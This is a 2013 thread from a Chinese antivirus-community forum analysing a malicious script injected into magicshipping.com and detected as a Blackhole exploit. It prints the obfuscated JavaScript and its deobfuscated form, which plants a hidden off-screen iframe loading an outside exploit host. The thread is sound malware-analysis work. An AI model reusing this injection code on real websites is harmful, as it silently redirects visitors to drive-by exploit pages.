收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://magicshipping.com/【挂马 by dayangyang】
返回列表 发新帖
查看: 726|回复: 2
收起左侧

[未鉴定] http://magicshipping.com/【挂马 by dayangyang】

[复制链接]
墨家小子
发表于 2013-4-18 14:04:30 | 显示全部楼层 |阅读模式
本帖最后由 蓝核 于 2013-4-19 07:02 编辑

2013/4/18        14:03:49        已删除         l\AA        C:\Program Files (x86)\Google\Chrome\Application\chrome.exe        C:\Sandbox\AA\Chrome\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00019d\000036f0.js        JS/Exploit-Blacole.gc (特洛伊)
回复

举报

dayangyang
发表于 2013-4-18 15:44:43 | 显示全部楼层
老毛子的Exploit。。
混淆代码非常有特点:
  1. <SCRIPT>ss=String["fromCharCode"];try{document.body|=1}catch(dgsgsdg){zz=26;whwej=12;ww=window;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4c","4a","4d","4b","4c","3l","47","46","46","3n","3l","4c","4b","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4c","4a","4d","4b","4c","3l","47","46","46","3n","3l","4c","4b","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-634!=0;i++){k=i;s+=ss(parseInt(n[i],zz));}z=s;ww["eval"](""+s);}}}}</SCRIPT>
复制代码
反混淆后是:

  2. if (document.getElementsByTagName('body')[0])
  3. {
  4.    iframer();
  5. }
  6. else
  7. {
  8.    document.write("<iframe src='http://trustconnects.info/?travel' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  9. }
  10. function iframer()
  11. {
  12.    var f = document.createElement('iframe');
  13.    f.setAttribute('src','http://trustconnects.info/?travel');
  14.    f.style.left='-10000px';
  15.    f.style.visibility='hidden';
  16.    f.style.top='0';
  17.    f.style.position='absolute';
  18.    f.style.top='0';
  19.    f.setAttribute('width','100');
  20.    f.setAttribute('height','100');
  21.    document.getElementsByTagName('body')[0].appendChild(f);
  22. }
复制代码
其中的http://trustconnects.info/?travel已经失效了 T T

评分

参与人数 1经验 +10 收起 理由
蓝核 + 10 感谢解答: )

查看全部评分

回复

举报

蓝核
发表于 2013-4-18 15:54:15 | 显示全部楼层
dayangyang 发表于 2013-4-18 15:44
老毛子的Exploit。。
混淆代码非常有特点:反混淆后是:其中的http://trustconnects.info/?travel已经失效 ...

有兴趣转正申请hunter么?
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 19:53 , Processed in 0.145295 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表